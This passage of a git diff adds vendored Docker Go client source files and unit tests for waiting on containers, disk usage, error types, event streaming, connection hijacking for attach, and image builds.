+	_, err := client.ContainerUpdate(context.Background(), "container_id", container.UpdateConfig{
+		Resources: container.Resources{
+			CPUPeriod: 1,
+		},
+		RestartPolicy: container.RestartPolicy{
+			Name: "always",
+		},
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/container_wait.go b/vendor/github.com/docker/docker/client/container_wait.go
new file mode 100644
index 0000000000..93212c70ee
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_wait.go
@@ -0,0 +1,26 @@
+package client
+
+import (
+	"encoding/json"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types/container"
+)
+
+// ContainerWait pauses execution until a container exits.
+// It returns the API status code as response of its readiness.
+func (cli *Client) ContainerWait(ctx context.Context, containerID string) (int64, error) {
+	resp, err := cli.post(ctx, "/containers/"+containerID+"/wait", nil, nil, nil)
+	if err != nil {
+		return -1, err
+	}
+	defer ensureReaderClosed(resp)
+
+	var res container.ContainerWaitOKBody
+	if err := json.NewDecoder(resp.body).Decode(&res); err != nil {
+		return -1, err
+	}
+
+	return res.StatusCode, nil
+}
diff --git a/vendor/github.com/docker/docker/client/container_wait_test.go b/vendor/github.com/docker/docker/client/container_wait_test.go
new file mode 100644
index 0000000000..9300bc0a54
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/container_wait_test.go
@@ -0,0 +1,70 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"log"
+	"net/http"
+	"strings"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types/container"
+
+	"golang.org/x/net/context"
+)
+
+func TestContainerWaitError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	code, err := client.ContainerWait(context.Background(), "nothing")
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+	if code != -1 {
+		t.Fatalf("expected a status code equal to '-1', got %d", code)
+	}
+}
+
+func TestContainerWait(t *testing.T) {
+	expectedURL := "/containers/container_id/wait"
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			b, err := json.Marshal(container.ContainerWaitOKBody{
+				StatusCode: 15,
+			})
+			if err != nil {
+				return nil, err
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader(b)),
+			}, nil
+		}),
+	}
+
+	code, err := client.ContainerWait(context.Background(), "container_id")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if code != 15 {
+		t.Fatalf("expected a status code equal to '15', got %d", code)
+	}
+}
+
+func ExampleClient_ContainerWait_withTimeout() {
+	ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
+	defer cancel()
+
+	client, _ := NewEnvClient()
+	_, err := client.ContainerWait(ctx, "container_id")
+	if err != nil {
+		log.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/disk_usage.go b/vendor/github.com/docker/docker/client/disk_usage.go
new file mode 100644
index 0000000000..03c80b39af
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/disk_usage.go
@@ -0,0 +1,26 @@
+package client
+
+import (
+	"encoding/json"
+	"fmt"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+// DiskUsage requests the current data usage from the daemon
+func (cli *Client) DiskUsage(ctx context.Context) (types.DiskUsage, error) {
+	var du types.DiskUsage
+
+	serverResp, err := cli.get(ctx, "/system/df", nil, nil)
+	if err != nil {
+		return du, err
+	}
+	defer ensureReaderClosed(serverResp)
+
+	if err := json.NewDecoder(serverResp.body).Decode(&du); err != nil {
+		return du, fmt.Errorf("Error retrieving disk usage: %v", err)
+	}
+
+	return du, nil
+}
diff --git a/vendor/github.com/docker/docker/client/errors.go b/vendor/github.com/docker/docker/client/errors.go
new file mode 100644
index 0000000000..bf6923f134
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/errors.go
@@ -0,0 +1,278 @@
+package client
+
+import (
+	"fmt"
+
+	"github.com/docker/docker/api/types/versions"
+	"github.com/pkg/errors"
+)
+
+// errConnectionFailed implements an error returned when connection failed.
+type errConnectionFailed struct {
+	host string
+}
+
+// Error returns a string representation of an errConnectionFailed
+func (err errConnectionFailed) Error() string {
+	if err.host == "" {
+		return "Cannot connect to the Docker daemon. Is the docker daemon running on this host?"
+	}
+	return fmt.Sprintf("Cannot connect to the Docker daemon at %s. Is the docker daemon running?", err.host)
+}
+
+// IsErrConnectionFailed returns true if the error is caused by connection failed.
+func IsErrConnectionFailed(err error) bool {
+	_, ok := errors.Cause(err).(errConnectionFailed)
+	return ok
+}
+
+// ErrorConnectionFailed returns an error with host in the error message when connection to docker daemon failed.
+func ErrorConnectionFailed(host string) error {
+	return errConnectionFailed{host: host}
+}
+
+type notFound interface {
+	error
+	NotFound() bool // Is the error a NotFound error
+}
+
+// IsErrNotFound returns true if the error is caused with an
+// object (image, container, network, volume, …) is not found in the docker host.
+func IsErrNotFound(err error) bool {
+	te, ok := err.(notFound)
+	return ok && te.NotFound()
+}
+
+// imageNotFoundError implements an error returned when an image is not in the docker host.
+type imageNotFoundError struct {
+	imageID string
+}
+
+// NotFound indicates that this error type is of NotFound
+func (e imageNotFoundError) NotFound() bool {
+	return true
+}
+
+// Error returns a string representation of an imageNotFoundError
+func (e imageNotFoundError) Error() string {
+	return fmt.Sprintf("Error: No such image: %s", e.imageID)
+}
+
+// IsErrImageNotFound returns true if the error is caused
+// when an image is not found in the docker host.
+func IsErrImageNotFound(err error) bool {
+	return IsErrNotFound(err)
+}
+
+// containerNotFoundError implements an error returned when a container is not in the docker host.
+type containerNotFoundError struct {
+	containerID string
+}
+
+// NotFound indicates that this error type is of NotFound
+func (e containerNotFoundError) NotFound() bool {
+	return true
+}
+
+// Error returns a string representation of a containerNotFoundError
+func (e containerNotFoundError) Error() string {
+	return fmt.Sprintf("Error: No such container: %s", e.containerID)
+}
+
+// IsErrContainerNotFound returns true if the error is caused
+// when a container is not found in the docker host.
+func IsErrContainerNotFound(err error) bool {
+	return IsErrNotFound(err)
+}
+
+// networkNotFoundError implements an error returned when a network is not in the docker host.
+type networkNotFoundError struct {
+	networkID string
+}
+
+// NotFound indicates that this error type is of NotFound
+func (e networkNotFoundError) NotFound() bool {
+	return true
+}
+
+// Error returns a string representation of a networkNotFoundError
+func (e networkNotFoundError) Error() string {
+	return fmt.Sprintf("Error: No such network: %s", e.networkID)
+}
+
+// IsErrNetworkNotFound returns true if the error is caused
+// when a network is not found in the docker host.
+func IsErrNetworkNotFound(err error) bool {
+	return IsErrNotFound(err)
+}
+
+// volumeNotFoundError implements an error returned when a volume is not in the docker host.
+type volumeNotFoundError struct {
+	volumeID string
+}
+
+// NotFound indicates that this error type is of NotFound
+func (e volumeNotFoundError) NotFound() bool {
+	return true
+}
+
+// Error returns a string representation of a volumeNotFoundError
+func (e volumeNotFoundError) Error() string {
+	return fmt.Sprintf("Error: No such volume: %s", e.volumeID)
+}
+
+// IsErrVolumeNotFound returns true if the error is caused
+// when a volume is not found in the docker host.
+func IsErrVolumeNotFound(err error) bool {
+	return IsErrNotFound(err)
+}
+
+// unauthorizedError represents an authorization error in a remote registry.
+type unauthorizedError struct {
+	cause error
+}
+
+// Error returns a string representation of an unauthorizedError
+func (u unauthorizedError) Error() string {
+	return u.cause.Error()
+}
+
+// IsErrUnauthorized returns true if the error is caused
+// when a remote registry authentication fails
+func IsErrUnauthorized(err error) bool {
+	_, ok := err.(unauthorizedError)
+	return ok
+}
+
+// nodeNotFoundError implements an error returned when a node is not found.
+type nodeNotFoundError struct {
+	nodeID string
+}
+
+// Error returns a string representation of a nodeNotFoundError
+func (e nodeNotFoundError) Error() string {
+	return fmt.Sprintf("Error: No such node: %s", e.nodeID)
+}
+
+// NotFound indicates that this error type is of NotFound
+func (e nodeNotFoundError) NotFound() bool {
+	return true
+}
+
+// IsErrNodeNotFound returns true if the error is caused
+// when a node is not found.
+func IsErrNodeNotFound(err error) bool {
+	_, ok := err.(nodeNotFoundError)
+	return ok
+}
+
+// serviceNotFoundError implements an error returned when a service is not found.
+type serviceNotFoundError struct {
+	serviceID string
+}
+
+// Error returns a string representation of a serviceNotFoundError
+func (e serviceNotFoundError) Error() string {
+	return fmt.Sprintf("Error: No such service: %s", e.serviceID)
+}
+
+// NotFound indicates that this error type is of NotFound
+func (e serviceNotFoundError) NotFound() bool {
+	return true
+}
+
+// IsErrServiceNotFound returns true if the error is caused
+// when a service is not found.
+func IsErrServiceNotFound(err error) bool {
+	_, ok := err.(serviceNotFoundError)
+	return ok
+}
+
+// taskNotFoundError implements an error returned when a task is not found.
+type taskNotFoundError struct {
+	taskID string
+}
+
+// Error returns a string representation of a taskNotFoundError
+func (e taskNotFoundError) Error() string {
+	return fmt.Sprintf("Error: No such task: %s", e.taskID)
+}
+
+// NotFound indicates that this error type is of NotFound
+func (e taskNotFoundError) NotFound() bool {
+	return true
+}
+
+// IsErrTaskNotFound returns true if the error is caused
+// when a task is not found.
+func IsErrTaskNotFound(err error) bool {
+	_, ok := err.(taskNotFoundError)
+	return ok
+}
+
+type pluginPermissionDenied struct {
+	name string
+}
+
+func (e pluginPermissionDenied) Error() string {
+	return "Permission denied while installing plugin " + e.name
+}
+
+// IsErrPluginPermissionDenied returns true if the error is caused
+// when a user denies a plugin's permissions
+func IsErrPluginPermissionDenied(err error) bool {
+	_, ok := err.(pluginPermissionDenied)
+	return ok
+}
+
+// NewVersionError returns an error if the APIVersion required
+// if less than the current supported version
+func (cli *Client) NewVersionError(APIrequired, feature string) error {
+	if versions.LessThan(cli.version, APIrequired) {
+		return fmt.Errorf("%q requires API version %s, but the Docker server is version %s", feature, APIrequired, cli.version)
+	}
+	return nil
+}
+
+// secretNotFoundError implements an error returned when a secret is not found.
+type secretNotFoundError struct {
+	name string
+}
+
+// Error returns a string representation of a secretNotFoundError
+func (e secretNotFoundError) Error() string {
+	return fmt.Sprintf("Error: no such secret: %s", e.name)
+}
+
+// NoFound indicates that this error type is of NotFound
+func (e secretNotFoundError) NotFound() bool {
+	return true
+}
+
+// IsErrSecretNotFound returns true if the error is caused
+// when a secret is not found.
+func IsErrSecretNotFound(err error) bool {
+	_, ok := err.(secretNotFoundError)
+	return ok
+}
+
+// pluginNotFoundError implements an error returned when a plugin is not in the docker host.
+type pluginNotFoundError struct {
+	name string
+}
+
+// NotFound indicates that this error type is of NotFound
+func (e pluginNotFoundError) NotFound() bool {
+	return true
+}
+
+// Error returns a string representation of a pluginNotFoundError
+func (e pluginNotFoundError) Error() string {
+	return fmt.Sprintf("Error: No such plugin: %s", e.name)
+}
+
+// IsErrPluginNotFound returns true if the error is caused
+// when a plugin is not found in the docker host.
+func IsErrPluginNotFound(err error) bool {
+	return IsErrNotFound(err)
+}
diff --git a/vendor/github.com/docker/docker/client/events.go b/vendor/github.com/docker/docker/client/events.go
new file mode 100644
index 0000000000..af47aefa74
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/events.go
@@ -0,0 +1,102 @@
+package client
+
+import (
+	"encoding/json"
+	"net/url"
+	"time"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/events"
+	"github.com/docker/docker/api/types/filters"
+	timetypes "github.com/docker/docker/api/types/time"
+)
+
+// Events returns a stream of events in the daemon. It's up to the caller to close the stream
+// by cancelling the context. Once the stream has been completely read an io.EOF error will
+// be sent over the error channel. If an error is sent all processing will be stopped. It's up
+// to the caller to reopen the stream in the event of an error by reinvoking this method.
+func (cli *Client) Events(ctx context.Context, options types.EventsOptions) (<-chan events.Message, <-chan error) {
+
+	messages := make(chan events.Message)
+	errs := make(chan error, 1)
+
+	started := make(chan struct{})
+	go func() {
+		defer close(errs)
+
+		query, err := buildEventsQueryParams(cli.version, options)
+		if err != nil {
+			close(started)
+			errs <- err
+			return
+		}
+
+		resp, err := cli.get(ctx, "/events", query, nil)
+		if err != nil {
+			close(started)
+			errs <- err
+			return
+		}
+		defer resp.body.Close()
+
+		decoder := json.NewDecoder(resp.body)
+
+		close(started)
+		for {
+			select {
+			case <-ctx.Done():
+				errs <- ctx.Err()
+				return
+			default:
+				var event events.Message
+				if err := decoder.Decode(&event); err != nil {
+					errs <- err
+					return
+				}
+
+				select {
+				case messages <- event:
+				case <-ctx.Done():
+					errs <- ctx.Err()
+					return
+				}
+			}
+		}
+	}()
+	<-started
+
+	return messages, errs
+}
+
+func buildEventsQueryParams(cliVersion string, options types.EventsOptions) (url.Values, error) {
+	query := url.Values{}
+	ref := time.Now()
+
+	if options.Since != "" {
+		ts, err := timetypes.GetTimestamp(options.Since, ref)
+		if err != nil {
+			return nil, err
+		}
+		query.Set("since", ts)
+	}
+
+	if options.Until != "" {
+		ts, err := timetypes.GetTimestamp(options.Until, ref)
+		if err != nil {
+			return nil, err
+		}
+		query.Set("until", ts)
+	}
+
+	if options.Filters.Len() > 0 {
+		filterJSON, err := filters.ToParamWithVersion(cliVersion, options.Filters)
+		if err != nil {
+			return nil, err
+		}
+		query.Set("filters", filterJSON)
+	}
+
+	return query, nil
+}
diff --git a/vendor/github.com/docker/docker/client/events_test.go b/vendor/github.com/docker/docker/client/events_test.go
new file mode 100644
index 0000000000..ba82d2f542
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/events_test.go
@@ -0,0 +1,165 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/events"
+	"github.com/docker/docker/api/types/filters"
+)
+
+func TestEventsErrorInOptions(t *testing.T) {
+	errorCases := []struct {
+		options       types.EventsOptions
+		expectedError string
+	}{
+		{
+			options: types.EventsOptions{
+				Since: "2006-01-02TZ",
+			},
+			expectedError: `parsing time "2006-01-02TZ"`,
+		},
+		{
+			options: types.EventsOptions{
+				Until: "2006-01-02TZ",
+			},
+			expectedError: `parsing time "2006-01-02TZ"`,
+		},
+	}
+	for _, e := range errorCases {
+		client := &Client{
+			client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+		}
+		_, errs := client.Events(context.Background(), e.options)
+		err := <-errs
+		if err == nil || !strings.Contains(err.Error(), e.expectedError) {
+			t.Fatalf("expected an error %q, got %v", e.expectedError, err)
+		}
+	}
+}
+
+func TestEventsErrorFromServer(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	_, errs := client.Events(context.Background(), types.EventsOptions{})
+	err := <-errs
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestEvents(t *testing.T) {
+
+	expectedURL := "/events"
+
+	filters := filters.NewArgs()
+	filters.Add("type", events.ContainerEventType)
+	expectedFiltersJSON := fmt.Sprintf(`{"type":{"%s":true}}`, events.ContainerEventType)
+
+	eventsCases := []struct {
+		options             types.EventsOptions
+		events              []events.Message
+		expectedEvents      map[string]bool
+		expectedQueryParams map[string]string
+	}{
+		{
+			options: types.EventsOptions{
+				Filters: filters,
+			},
+			expectedQueryParams: map[string]string{
+				"filters": expectedFiltersJSON,
+			},
+			events:         []events.Message{},
+			expectedEvents: make(map[string]bool),
+		},
+		{
+			options: types.EventsOptions{
+				Filters: filters,
+			},
+			expectedQueryParams: map[string]string{
+				"filters": expectedFiltersJSON,
+			},
+			events: []events.Message{
+				{
+					Type:   "container",
+					ID:     "1",
+					Action: "create",
+				},
+				{
+					Type:   "container",
+					ID:     "2",
+					Action: "die",
+				},
+				{
+					Type:   "container",
+					ID:     "3",
+					Action: "create",
+				},
+			},
+			expectedEvents: map[string]bool{
+				"1": true,
+				"2": true,
+				"3": true,
+			},
+		},
+	}
+
+	for _, eventsCase := range eventsCases {
+		client := &Client{
+			client: newMockClient(func(req *http.Request) (*http.Response, error) {
+				if !strings.HasPrefix(req.URL.Path, expectedURL) {
+					return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+				}
+				query := req.URL.Query()
+
+				for key, expected := range eventsCase.expectedQueryParams {
+					actual := query.Get(key)
+					if actual != expected {
+						return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual)
+					}
+				}
+
+				buffer := new(bytes.Buffer)
+
+				for _, e := range eventsCase.events {
+					b, _ := json.Marshal(e)
+					buffer.Write(b)
+				}
+
+				return &http.Response{
+					StatusCode: http.StatusOK,
+					Body:       ioutil.NopCloser(buffer),
+				}, nil
+			}),
+		}
+
+		messages, errs := client.Events(context.Background(), eventsCase.options)
+
+	loop:
+		for {
+			select {
+			case err := <-errs:
+				if err != nil && err != io.EOF {
+					t.Fatal(err)
+				}
+
+				break loop
+			case e := <-messages:
+				_, ok := eventsCase.expectedEvents[e.ID]
+				if !ok {
+					t.Fatalf("event received not expected with action %s & id %s", e.Action, e.ID)
+				}
+			}
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/hijack.go b/vendor/github.com/docker/docker/client/hijack.go
new file mode 100644
index 0000000000..74c53f52b3
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/hijack.go
@@ -0,0 +1,177 @@
+package client
+
+import (
+	"crypto/tls"
+	"errors"
+	"fmt"
+	"net"
+	"net/http"
+	"net/http/httputil"
+	"net/url"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/pkg/tlsconfig"
+	"github.com/docker/go-connections/sockets"
+	"golang.org/x/net/context"
+)
+
+// tlsClientCon holds tls information and a dialed connection.
+type tlsClientCon struct {
+	*tls.Conn
+	rawConn net.Conn
+}
+
+func (c *tlsClientCon) CloseWrite() error {
+	// Go standard tls.Conn doesn't provide the CloseWrite() method so we do it
+	// on its underlying connection.
+	if conn, ok := c.rawConn.(types.CloseWriter); ok {
+		return conn.CloseWrite()
+	}
+	return nil
+}
+
+// postHijacked sends a POST request and hijacks the connection.
+func (cli *Client) postHijacked(ctx context.Context, path string, query url.Values, body interface{}, headers map[string][]string) (types.HijackedResponse, error) {
+	bodyEncoded, err := encodeData(body)
+	if err != nil {
+		return types.HijackedResponse{}, err
+	}
+
+	apiPath := cli.getAPIPath(path, query)
+	req, err := http.NewRequest("POST", apiPath, bodyEncoded)
+	if err != nil {
+		return types.HijackedResponse{}, err
+	}
+	req = cli.addHeaders(req, headers)
+
+	req.Host = cli.addr
+	req.Header.Set("Connection", "Upgrade")
+	req.Header.Set("Upgrade", "tcp")
+
+	conn, err := dial(cli.proto, cli.addr, resolveTLSConfig(cli.client.Transport))
+	if err != nil {
+		if strings.Contains(err.Error(), "connection refused") {
+			return types.HijackedResponse{}, fmt.Errorf("Cannot connect to the Docker daemon. Is 'docker daemon' running on this host?")
+		}
+		return types.HijackedResponse{}, err
+	}
+
+	// When we set up a TCP connection for hijack, there could be long periods
+	// of inactivity (a long running command with no output) that in certain
+	// network setups may cause ECONNTIMEOUT, leaving the client in an unknown
+	// state. Setting TCP KeepAlive on the socket connection will prohibit
+	// ECONNTIMEOUT unless the socket connection truly is broken
+	if tcpConn, ok := conn.(*net.TCPConn); ok {
+		tcpConn.SetKeepAlive(true)
+		tcpConn.SetKeepAlivePeriod(30 * time.Second)
+	}
+
+	clientconn := httputil.NewClientConn(conn, nil)
+	defer clientconn.Close()
+
+	// Server hijacks the connection, error 'connection closed' expected
+	_, err = clientconn.Do(req)
+
+	rwc, br := clientconn.Hijack()
+
+	return types.HijackedResponse{Conn: rwc, Reader: br}, err
+}
+
+func tlsDial(network, addr string, config *tls.Config) (net.Conn, error) {
+	return tlsDialWithDialer(new(net.Dialer), network, addr, config)
+}
+
+// We need to copy Go's implementation of tls.Dial (pkg/cryptor/tls/tls.go) in
+// order to return our custom tlsClientCon struct which holds both the tls.Conn
+// object _and_ its underlying raw connection. The rationale for this is that
+// we need to be able to close the write end of the connection when attaching,
+// which tls.Conn does not provide.
+func tlsDialWithDialer(dialer *net.Dialer, network, addr string, config *tls.Config) (net.Conn, error) {
+	// We want the Timeout and Deadline values from dialer to cover the
+	// whole process: TCP connection and TLS handshake. This means that we
+	// also need to start our own timers now.
+	timeout := dialer.Timeout
+
+	if !dialer.Deadline.IsZero() {
+		deadlineTimeout := dialer.Deadline.Sub(time.Now())
+		if timeout == 0 || deadlineTimeout < timeout {
+			timeout = deadlineTimeout
+		}
+	}
+
+	var errChannel chan error
+
+	if timeout != 0 {
+		errChannel = make(chan error, 2)
+		time.AfterFunc(timeout, func() {
+			errChannel <- errors.New("")
+		})
+	}
+
+	proxyDialer, err := sockets.DialerFromEnvironment(dialer)
+	if err != nil {
+		return nil, err
+	}
+
+	rawConn, err := proxyDialer.Dial(network, addr)
+	if err != nil {
+		return nil, err
+	}
+	// When we set up a TCP connection for hijack, there could be long periods
+	// of inactivity (a long running command with no output) that in certain
+	// network setups may cause ECONNTIMEOUT, leaving the client in an unknown
+	// state. Setting TCP KeepAlive on the socket connection will prohibit
+	// ECONNTIMEOUT unless the socket connection truly is broken
+	if tcpConn, ok := rawConn.(*net.TCPConn); ok {
+		tcpConn.SetKeepAlive(true)
+		tcpConn.SetKeepAlivePeriod(30 * time.Second)
+	}
+
+	colonPos := strings.LastIndex(addr, ":")
+	if colonPos == -1 {
+		colonPos = len(addr)
+	}
+	hostname := addr[:colonPos]
+
+	// If no ServerName is set, infer the ServerName
+	// from the hostname we're connecting to.
+	if config.ServerName == "" {
+		// Make a copy to avoid polluting argument or default.
+		config = tlsconfig.Clone(config)
+		config.ServerName = hostname
+	}
+
+	conn := tls.Client(rawConn, config)
+
+	if timeout == 0 {
+		err = conn.Handshake()
+	} else {
+		go func() {
+			errChannel <- conn.Handshake()
+		}()
+
+		err = <-errChannel
+	}
+
+	if err != nil {
+		rawConn.Close()
+		return nil, err
+	}
+
+	// This is Docker difference with standard's crypto/tls package: returned a
+	// wrapper which holds both the TLS and raw connections.
+	return &tlsClientCon{conn, rawConn}, nil
+}
+
+func dial(proto, addr string, tlsConfig *tls.Config) (net.Conn, error) {
+	if tlsConfig != nil && proto != "unix" && proto != "npipe" {
+		// Notice this isn't Go standard's tls.Dial function
+		return tlsDial(proto, addr, tlsConfig)
+	}
+	if proto == "npipe" {
+		return sockets.DialPipe(addr, 32*time.Second)
+	}
+	return net.Dial(proto, addr)
+}
diff --git a/vendor/github.com/docker/docker/client/image_build.go b/vendor/github.com/docker/docker/client/image_build.go
new file mode 100644
index 0000000000..6fde75dcfd
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/image_build.go
@@ -0,0 +1,123 @@
+package client
+
+import (
+	"encoding/base64"
+	"encoding/json"
+	"io"
+	"net/http"
+	"net/url"
+	"strconv"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/container"
+)
+
+// ImageBuild sends request to the daemon to build images.
+// The Body in the response implement an io.ReadCloser and it's up to the caller to
+// close it.
+func (cli *Client) ImageBuild(ctx context.Context, buildContext io.Reader, options types.ImageBuildOptions) (types.ImageBuildResponse, error) {
+	query, err := cli.imageBuildOptionsToQuery(options)
+	if err != nil {
+		return types.ImageBuildResponse{}, err
+	}
+
+	headers := http.Header(make(map[string][]string))
+	buf, err := json.Marshal(options.AuthConfigs)
+	if err != nil {
+		return types.ImageBuildResponse{}, err
+	}
+	headers.Add("X-Registry-Config", base64.URLEncoding.EncodeToString(buf))
+	headers.Set("Content-Type", "application/tar")
+
+	serverResp, err := cli.postRaw(ctx, "/build", query, buildContext, headers)
+	if err != nil {
+		return types.ImageBuildResponse{}, err
+	}
+
+	osType := getDockerOS(serverResp.header.Get("Server"))
+
+	return types.ImageBuildResponse{
+		Body:   serverResp.body,
+		OSType: osType,
+	}, nil
+}
+
+func (cli *Client) imageBuildOptionsToQuery(options types.ImageBuildOptions) (url.Values, error) {
+	query := url.Values{
+		"t":           options.Tags,
+		"securityopt": options.SecurityOpt,
+	}
+	if options.SuppressOutput {
+		query.Set("q", "1")
+	}
+	if options.RemoteContext != "" {
+		query.Set("remote", options.RemoteContext)
+	}
+	if options.NoCache {
+		query.Set("nocache", "1")
+	}
+	if options.Remove {
+		query.Set("rm", "1")
+	} else {
+		query.Set("rm", "0")
+	}
+
+	if options.ForceRemove {
+		query.Set("forcerm", "1")
+	}
+
+	if options.PullParent {
+		query.Set("pull", "1")
+	}
+
+	if options.Squash {
+		if err := cli.NewVersionError("1.25", "squash"); err != nil {
+			return query, err
+		}
+		query.Set("squash", "1")
+	}
+
+	if !container.Isolation.IsDefault(options.Isolation) {
+		query.Set("isolation", string(options.Isolation))
+	}
+
+	query.Set("cpusetcpus", options.CPUSetCPUs)
+	query.Set("networkmode", options.NetworkMode)
+	query.Set("cpusetmems", options.CPUSetMems)
+	query.Set("cpushares", strconv.FormatInt(options.CPUShares, 10))
+	query.Set("cpuquota", strconv.FormatInt(options.CPUQuota, 10))
+	query.Set("cpuperiod", strconv.FormatInt(options.CPUPeriod, 10))
+	query.Set("memory", strconv.FormatInt(options.Memory, 10))
+	query.Set("memswap", strconv.FormatInt(options.MemorySwap, 10))
+	query.Set("cgroupparent", options.CgroupParent)
+	query.Set("shmsize", strconv.FormatInt(options.ShmSize, 10))
+	query.Set("dockerfile", options.Dockerfile)
+
+	ulimitsJSON, err := json.Marshal(options.Ulimits)
+	if err != nil {
+		return query, err
+	}
+	query.Set("ulimits", string(ulimitsJSON))
+
+	buildArgsJSON, err := json.Marshal(options.BuildArgs)
+	if err != nil {
+		return query, err
+	}
+	query.Set("buildargs", string(buildArgsJSON))
+
+	labelsJSON, err := json.Marshal(options.Labels)
+	if err != nil {
+		return query, err
+	}
+	query.Set("labels", string(labelsJSON))
+
+	cacheFromJSON, err := json.Marshal(options.CacheFrom)
+	if err != nil {
+		return query, err
+	}
+	query.Set("cachefrom", string(cacheFromJSON))
+
+	return query, nil
+}
diff --git a/vendor/github.com/docker/docker/client/image_build_test.go b/vendor/github.com/docker/docker/client/image_build_test.go
new file mode 100644
index 0000000000..b9d04f817a
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/image_build_test.go
@@ -0,0 +1,233 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"reflect"
+	"strings"
+	"testing"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/go-units"
+)
+
+func TestImageBuildError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	_, err := client.ImageBuild(context.Background(), nil, types.ImageBuildOptions{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestImageBuild(t *testing.T) {
+	v1 := "value1"
+	v2 := "value2"
+	emptyRegistryConfig := "bnVsbA=="
+	buildCases := []struct {
+		buildOptions           types.ImageBuildOptions
+		expectedQueryParams    map[string]string
+		expectedTags           []string
+		expectedRegistryConfig string
+	}{
+		{
+			buildOptions: types.ImageBuildOptions{
+				SuppressOutput: true,
+				NoCache:        true,
+				Remove:         true,
+				ForceRemove:    true,
+				PullParent:     true,
+			},
+			expectedQueryParams: map[string]string{
+				"q":       "1",
+				"nocache": "1",
+				"rm":      "1",
+				"forcerm": "1",
+				"pull":    "1",
+			},
+			expectedTags:           []string{},
+			expectedRegistryConfig: emptyRegistryConfig,
+		},
+		{
+			buildOptions: types.ImageBuildOptions{
+				SuppressOutput: false,
+				NoCache:        false,
+				Remove:         false,
+				ForceRemove:    false,
+				PullParent:     false,
+			},
+			expectedQueryParams: map[string]string{
+				"q":       "",
+				"nocache": "",
+				"rm":      "0",
+				"forcerm": "",
+				"pull":    "",
+			},
+			expectedTags:           []string{},
+			expectedRegistryConfig: emptyRegistryConfig,
+		},
+		{
+			buildOptions: types.ImageBuildOptions{
+				RemoteContext: "remoteContext",
+				Isolation:     container.Isolation("isolation"),
+				CPUSetCPUs:    "2",
+				CPUSetMems:    "12",
+				CPUShares:     20,
+				CPUQuota:      10,
+				CPUPeriod:     30,
+				Memory:        256,
+				MemorySwap:    512,
+				ShmSize:       10,
+				CgroupParent:  "cgroup_parent",
+				Dockerfile:    "Dockerfile",
+			},
+			expectedQueryParams: map[string]string{
+				"remote":       "remoteContext",
+				"isolation":    "isolation",
+				"cpusetcpus":   "2",
+				"cpusetmems":   "12",
+				"cpushares":    "20",
+				"cpuquota":     "10",
+				"cpuperiod":    "30",
+				"memory":       "256",
+				"memswap":      "512",
+				"shmsize":      "10",
+				"cgroupparent": "cgroup_parent",
+				"dockerfile":   "Dockerfile",
+				"rm":           "0",
+			},
+			expectedTags:           []string{},
+			expectedRegistryConfig: emptyRegistryConfig,
+		},
+		{
+			buildOptions: types.ImageBuildOptions{
+				BuildArgs: map[string]*string{
+					"ARG1": &v1,
+					"ARG2": &v2,
+					"ARG3": nil,
+				},
+			},
+			expectedQueryParams: map[string]string{
+				"buildargs": `{"ARG1":"value1","ARG2":"value2","ARG3":null}`,
+				"rm":        "0",
+			},
+			expectedTags:           []string{},
+			expectedRegistryConfig: emptyRegistryConfig,
+		},
+		{
+			buildOptions: types.ImageBuildOptions{
+				Ulimits: []*units.Ulimit{
+					{
+						Name: "nproc",
+						Hard: 65557,
+						Soft: 65557,
+					},
+					{
+						Name: "nofile",
+						Hard: 20000,
+						Soft: 40000,
+					},
+				},
+			},
+			expectedQueryParams: map[string]string{
